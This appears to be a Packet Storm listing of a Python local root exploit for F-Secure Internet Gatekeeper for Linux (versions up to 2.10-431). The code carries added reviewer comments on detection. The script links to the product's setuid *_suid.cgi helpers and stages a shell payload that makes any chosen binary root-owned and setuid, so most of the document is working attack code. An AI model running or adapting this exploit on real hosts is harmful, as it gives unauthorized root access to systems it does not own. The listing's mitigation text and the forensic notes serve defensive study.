
fsigk_exp.py.txt

🗓️ 10 Nov 2005 00:00:00Reported by xavierType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

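Local root exploit for F-Secure Internet Gatekeeper on Linux, with usage instructions. The script's own banner gives the affected versions as <=2.10-431, and the listing works through the product's setuid `*_suid.cgi` helper programs; on a host running such a version, updating the product and reviewing those setuid helpers are the relevant mitigations.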

Code
`#!/usr/bin/env python  
################################################################  
## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit  
## acknowledgements: everyone in pure-elite and uDc.  
##  
## coded by: [email protected] [http://xavsec.blogspot.com]  
################################################################  
  
################################################################  
## Make proper checks and import necessary calls from modules.  
##  
  
try:   
from sys import argv  
except Exception:   
print "the 'sys' module could not be loaded"  
raise SystemExit  
  
try:   
from os import unlink, stat, error, symlink, system, chmod  
except Exception:  
print "the 'os' module could not be loaded"  
raise SystemExit  
  
try:   
import getopt  
except Exception:   
print "the 'getopt' module could not be loaded"  
raise SystemExit  
  
################################################################  
## Constants.  
##  
  
# Module-level metadata used by the banner and by the help/version output.
__program__ = argv[0]  # name the script was invoked as; interpolated into the usage text
__version__ = "0.1beta"
__author__ = "<[email protected]>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
# Help text printed for -h/--help. The numbered flags choose which of the
# product's setuid "*_suid.cgi" helpers _handleopts() selects.
# NOTE(review): the text advertises only --version, while _handleopts() also
# accepts -v.
__usage__ = """usage: %s [-options]  
  
options:  
--version show program's version number and exit.  
-h, --help show this help message and exit.  
  
-s, --suid file location to suid.  
-d, --dir cgi directory.  
-c, --clean cleans any left over files from the environment creation.  
-# enter numerical value of vulnerable file to exploit. [list below]  
  
1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi  
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi  
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi  
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi  
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi  
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)
  
################################################################  
## Functions.  
##  
  
def _write(file, payload):
    """Write *payload* to *file*, then set the file's mode to 0100.

    Mode 0100 is owner-execute only. Any exception is caught and printed with
    a "[-]" prefix rather than raised, so the caller gets no signal that the
    write or the chmod failed.

    NOTE(review): for incident response, the file written here is one of the
    plain ``*.cgi`` names chosen in _handleopts(), created in the current
    working directory of the invoking user.
    """
    try:
        # The file object is never closed explicitly; closing is left to
        # garbage collection.
        open(file, 'w').write(payload)
        chmod(file, 0100)
    except Exception, err:
        print ("[-] %s" % (err))
  
def _exists(path):
    """Report whether *path* can be stat()'d.

    Returns True when ``os.stat`` succeeds and False when it raises
    ``os.error``; any other exception propagates to the caller.
    """
    try:
        stat(path)
    except error:
        found = False
    else:
        found = True
    return found
  
def _handleopts():
    """Parse the command line and stage the two files main() relies on.

    Steps, in order:
      1. -h/--help and -v/--version print their text and exit.
      2. A numeric flag (-1 .. -17) picks the setuid helper name
         (``_method_``) and the matching plain ``.cgi`` name (``_file_``);
         the default is the ifconfig pair.
      3. getopt handles -c/--clean, -d/--dir and -s/--suid.
      4. With a directory and a payload in hand, a symlink named ``runbad``
         pointing at ``<dir>/<method>`` and a file named ``_file_`` holding
         the payload are created in the current working directory.

    Every failure path raises SystemExit, most after printing a "[-]" line.

    NOTE(review): why the helper ends up running the staged file is not shown
    in this script; presumably the setuid helper locates its companion
    ``.cgi`` relative to the path it was invoked through -- confirm against
    the vendor advisory. For defenders, the observable indicators are a
    symlink to a ``*_suid.cgi`` helper outside the product directory and a
    mode-0100 file named after a product CGI script beside it.
    """
    # Pass 1: informational flags short-circuit everything else.
    for opt in argv[1:]:
        if opt in ("-h", "--help"):
            print "%s" % (__usage__),
            raise SystemExit
        if opt in ("-v", "--version"):
            print "%s (%s)" % (__version__, __lastedit__),
            raise SystemExit

    # Pass 2: map the numeric selector to a (setuid helper, plain script)
    # pair by plain string comparison. The last selector on the command line
    # wins; unknown arguments are ignored here.
    _method_ = 'ifconfig_suid.cgi'
    _file_ = 'ifconfig.cgi'
    for opt in argv[1:]:
        if opt == "-1":
            # Only _method_ is reset; _file_ keeps whatever an earlier
            # selector on the same command line assigned.
            _method_ = 'ifconfig_suid.cgi'
        elif opt == "-2":
            _method_ = 'reboot_suid.cgi'
            _file_ = 'reboot.cgi'
        elif opt == "-3":
            _method_ = 'proxy_suid.cgi'
            _file_ = 'proxy.cgi'
        elif opt == "-4":
            _method_ = 'edittmpl_suid.cgi'
            _file_ = 'edittmpl.cgi'
        elif opt == "-5":
            _method_ = 'version_suid.cgi'
            _file_ = 'version.cgi'
        elif opt == "-6":
            _method_ = 'hostname_suid.cgi'
            _file_ = 'hostname.cgi'
        elif opt == "-7":
            _method_ = 'gateway_suid.cgi'
            _file_ = 'gateway.cgi'
        elif opt == "-8":
            _method_ = 'halt_suid.cgi'
            _file_ = 'halt.cgi'
        elif opt == "-9":
            _method_ = 'edituserdb_suid.cgi'
            _file_ = 'edituserdb.cgi'
        elif opt == "-10":
            _method_ = 'htpasswd_suid.cgi'
            _file_ = 'htpasswd.cgi'
        elif opt == "-11":
            _method_ = 'pattern_up_suid.cgi'
            _file_ = 'pattern_up.cgi'
        elif opt == "-12":
            _method_ = 'license_suid.cgi'
            _file_ = 'license.cgi'
        elif opt == "-13":
            _method_ = 'iptables_suid.cgi'
            _file_ = 'iptables.cgi'
        elif opt == "-14":
            _method_ = 'dns_suid.cgi'
            _file_ = 'dns.cgi'
        elif opt == "-15":
            _method_ = 'pattern_autoup_suid.cgi'
            _file_ = 'pattern_autoup.cgi'
        elif opt == "-16":
            _method_ = 'spam_list_suid.cgi'
            _file_ = 'spam_list.cgi'
        elif opt == "-17":
            _method_ = 'diag_suid.cgi'
            _file_ = 'diag.cgi'
        else:
            pass

    # Pass 3: getopt. Every digit is declared as its own short flag only so
    # that the numeric selectors do not trip getopt's unknown-option error;
    # a two-digit selector such as -10 is seen by getopt as -1 followed by -0.
    try:
        opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
        'suid=', \
        'dir='])[0]
    except Exception, (err):
        print "[-] %s" % (err),
        raise SystemExit

    _dir_ = None
    _payload_ = None
    _combine_ = None  # never read; the path below is stored in _combined_

    for o, a in opts:
        if o in ("-c", "--clean"):
            _clean()
            print "[*] done"
            raise SystemExit
        if o in ("-d", "--dir"):
            if _exists(a):
                _dir_ = a
            else:
                # NOTE(review): prints the current _dir_ (None unless an
                # earlier -d succeeded), not the rejected argument `a`.
                print "[-] unable to access the %s directory" % (_dir_),
                raise SystemExit
        if o in ("-s", "--suid"):
            if _exists(a):
                _payload_ = _suid(a)
            else:
                print "[-] unable to access binary."
                raise SystemExit

    # Both -d and -s are mandatory, and the selected helper must exist in
    # the given directory.
    if _dir_ == None:
        print "[-] no directory was given [try -h for help menu]"
        raise SystemExit
    if _payload_ == None:
        print "[-] enter binary to suid [try -h for help menu]"
        raise SystemExit
    _combined_ = "%s/%s" % (_dir_, _method_)
    if not _exists(_combined_):
        print "[-] method not possible, try another."
        raise SystemExit

    print "[*] creating environment..."
    try:
        # Staging in the current working directory: the 'runbad' symlink to
        # the setuid helper, and the payload under the plain script name.
        symlink('%s/%s' % (_dir_, _method_), 'runbad')
        _write(_file_, _payload_)
    except Exception, err:
        # Exits without printing the error; _write() already swallows its
        # own exceptions, so in practice this covers the symlink() call.
        raise SystemExit
  
  
def _suid(file):
    """Return the shell-script text that _handleopts() stages as the payload.

    The script chowns *file* to uid/gid 0 and sets mode 4755 (setuid bit plus
    rwxr-xr-x). *file* is interpolated unquoted via ``%(file)s`` from
    ``locals()``.

    NOTE(review): the lasting effect on an affected host is a root-owned
    setuid file at the path given with -s/--suid; an inventory of setuid
    files compared against a known-good baseline is the matching detection.
    """
    _suid_ = """#!/bin/sh  
chown 0.0 %(file)s  
chmod 4755 %(file)s  
""" % (locals())
    return _suid_
  
  
def _clean():
    """Delete the staging files from the current working directory.

    Each listed name is unlinked only if _exists() reports it present.
    Exceptions are printed with a "[-]" prefix and not raised.

    NOTE(review): the list ends with 'diag_suid.cgi', whereas selector -17
    in _handleopts() writes 'diag.cgi'; that file is therefore not removed
    by this routine and can remain as a forensic artefact.
    """
    try:
        files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi',
        'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
        'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
        'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi',
        'spam_list.cgi', 'diag_suid.cgi']

        for file in files:
            if _exists(file): unlink(file)

    except Exception, err:
        print "[-] %s" % (err),
  
  
#################################################################  
## main() // main code.  
##  
  
def main():
    """Entry point: print the banner, stage files, run ./runbad, clean up.

    The banner string names the affected product versions as "<=2.10-431".
    _handleopts() creates the 'runbad' symlink and the payload file;
    system('./runbad') then executes the symlink target through the shell,
    and _clean() removes the staging files afterwards.

    On KeyboardInterrupt the script exits without calling _clean(); on any
    other Exception it calls _clean() and exits without printing the error.
    """
    try:
        print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
        print "[*] handling options, arguments..."
        _handleopts()
        print "[*] executing exploit..."
        # The return status of system() is ignored, so the "done" message
        # below is printed whether or not the helper ran successfully.
        system('./runbad')
        print "[*] cleaning..."
        _clean()
        print "[*] done... try executing the specified binary."
    except KeyboardInterrupt:
        print "[-] caught keyboard interuption"
        raise SystemExit
    except Exception, (err):
        _clean()
        raise SystemExit

# Run only when executed as a script, not when imported.
if __name__ == '__main__': main()
  
`


10 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4
28